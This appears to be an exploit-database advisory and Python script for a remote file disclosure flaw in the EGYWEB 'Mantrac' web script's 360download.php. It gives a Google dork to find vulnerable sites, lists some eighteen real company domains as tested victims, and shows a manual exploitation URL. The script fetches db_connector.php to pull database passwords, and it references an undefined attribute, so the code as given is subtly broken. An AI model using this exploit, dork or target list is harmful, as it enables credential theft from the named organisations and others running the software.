EGYWEB (Mantrac) <
=
Remote
File
Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[
+
] Author : KnocKout
[~] Contact (onlymail) : knockout@e
-
mail.com.tr
[~] (.py) Exploit Coded by : B3mB4m
[~] HomePage : http:
/
/
Cyber
-
Warrior.Org
-
http:
/
/
h4x0resec.blogspot.com
[~] Special Thankz:
1337day
.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : EGYWEB
|~Affected Version : Mantrac Script
|~Software : www.egyweb.com
|~RISK : Medium
|~Google Keyword
/
Dork :
"Created by EGYWEB"
|
"EGYWEB"
inurl:index.php?pg
=
| inurl:
360download
.php
|~Tested On : [L] Kali Linux \ Mozilla Firefox \ Arora \ [R)
ALL
example sites.
####################INFO################################
database passwords can be drawn.
### Error Line in '360download.php' ##
..
..
$file_name
=
$_REQUEST[
'file_name'
];
download($file_name);
?>
########################################################
Example
and
tested on;
http:
/
/
www.deltagroup.com.eg
http:
/
/
www.mantracvostok.ru
http:
/
/
www.mantracghana.com
http:
/
/
www.mantracnigeria.com
http:
/
/
www.mantrackenya.com
http:
/
/
www.mantractanzania.com
http:
/
/
www.unatrac.com
http:
/
/
www.iratrac.com
http:
/
/
www.iratrac.iq
http:
/
/
www.unatrac.com
http:
/
/
www.mantracvostok.com
http:
/
/
www.mantrac
-
sl.com
http:
/
/
www.mantracuganda.com
http:
/
/
www.mantracegypt.com
http:
/
/
www.quest.com.eg
http:
/
/
www.delta
-
ghana.com
http:
/
/
www.delta
-
tanzania.com
http:
/
/
www.pyramidscapital.com
/
eng
/
############################################################
Manual Exploitation; http:
/
/
$VICTIM
/
360download
.php?filename
=
[LOCAL
FILE
]
############################################################
=
=
=
=
=
=
=
=
=
Automatic
"db_connector.php"
File
Disclosure Exploit
=
=
=
=
=
=
=
=
##################### exploit.py in ##############################
import
urllib
def
master():
print
"""
########################################################
EGYWEB <= Remote File Disclosure Vulnerability (.py)
Automatic "db_connector.php" File Disclosure Exploit
Researched by KnocKout
Exploit Coded by B3mB4m
Website: http://h4x0resec.blogspot.com / h4x0re Security
============
How to use :
python exploit.py
Target : http://VICTIM.com
Target : http://VICTIM.com/path
That's it ! Happy END !
#################################################
"""
class
KnocKout:
def
__init__(
self
):
self
.ask
=
raw_input
(
"Target : "
)
def
exploit(
self
):
try
:
urllib.urlretrieve(
self
.ask
+
"/360download.php?file_name=classes/db_connector.php"
,
self
.rename)
print
"Finish ! Config --> %s "
%
(
self
.rename)
except
:
print
"This website have a security sorry ! "
;
if
__name__
=
=
'__main__'
:
master()
op
=
KnocKout()
op.exploit()